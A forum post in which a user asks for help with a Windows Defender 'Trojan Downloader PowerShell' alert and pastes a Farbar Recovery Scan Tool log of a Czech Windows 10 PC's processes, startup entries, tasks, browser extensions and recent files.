
Please check my log

#1 Post by chenny »

Hello, please check my log. After the PC starts, an error message pops up and Windows Defender reports a detection of the Trojan Downloader PowerShell virus.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 07:13:34)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Appwork GmbH -> AppWork GmbH) C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\JDownloader2.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mstsc.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-19]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-15]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-15]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-15]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 07:13 - 2021-01-20 07:14 - 000020784 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 07:13 - 2021-01-20 07:13 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 07:14 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 07:13 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\Program Files\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
